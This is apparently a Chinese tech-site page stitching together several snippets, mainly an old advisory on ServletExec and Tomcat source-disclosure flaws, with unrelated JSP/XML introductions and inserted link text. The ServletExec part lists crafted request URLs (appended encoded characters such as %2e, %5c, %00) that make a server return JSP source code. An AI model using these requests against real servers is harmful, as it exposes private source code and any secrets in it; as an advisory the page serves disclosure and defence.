引言:
涉及程序: ServletExec
描述: 在HTTP请求中添加特殊字符导致暴露JSP源代码文件
详细: Unify eWave ServletExec 是一个 Java/Java Servlet 引擎插件,主要用于 WEB 服务器,例如:Microsoft IIS, Apache...
摘要:
jsp和servlet到底在应用上有什么区别,很多人搞不清楚。我来胡扯几句吧。简单的说,sun首先发展出servlet,其功能比较强劲,体系设计也很先进,只是,它输出html语句还是采用了老的cgi方式,是一句一句输出,所以,编写和修改html非常不方便。 后来sun推出了类似于asp的镶嵌型的jsp,把jsp tag镶嵌到html语句中,这样,就大大简化和方便了网页的设计和修改。新型的网络语言......
摘要:
tomcat 暴露jsp文件内容
涉及程序: tomcat
详细: java server pages (jsp)类型的文件是以.jsp扩展名在tomcat 上注册,tomcat 是文件名大小写敏感的,.jsp和.jsp是不同类型的文件扩展名。如果提交有.jsp的链接给tomcat,而tomcat找不到.jsp就会以默认的.text文件类型来响应请求。因为在nt系统中大小写文件名是非敏......
在HTTP请求中添加特殊字符导致暴露JSP源代码文件
涉及程序:
描述: 【程序编程相关:JSP实现论坛树型结构的具体算法】
servletexec
【推荐阅读:应用JDOM处理数据库到XML转换的JS】
详细: 【扩展信息:一个用JSP实现的分页的类及调用方法】
在http请求中添加特殊字符导致暴露jsp源代码文件 unify ewave servletexec 是一个 java/java servlet 引擎插件,主要用于 web 服务器,例如:microsoft iis, apache, netscape enterprise 服务器等等.
当一个 http 请求中添加下列字符之一,servletexec 将返回 jsp 源代码文件.
.%2e+%2b\%5c%20%00
成功的利用该漏洞将导致泄露指定的jsp文件的源代码
例如:
使用下面的任意一个url请求将输出指定的jsp文件的源代码:http://target/directory/jsp/file.jsp. http://target/directory/jsp/file.jsp%2ehttp://target/directory/jsp/file.jsp+ http://target/directory/jsp/file.jsp%2bhttp://target/directory/jsp/file.jsp\ http://target/directory/jsp/file.jsp%5chttp://target/directory/jsp/file.jsp%20 http://target/directory/jsp/file.jsp%00 ...
下一页 摘要:
概览:
xml和jsp是这些日子中最热的东西。本文介绍如何联合这两种技术来建设动态网站。你还可以同时看一下dom,xpath,xsl,和其它java-xml技术的示例代码。
我们在此假设你已经了解javaserver pages(jsp)和extensible markup language (xml)。但也许你对该如何综合使用它们仍然有些迷惑。
jsp的应用很容易,你可以用它设......
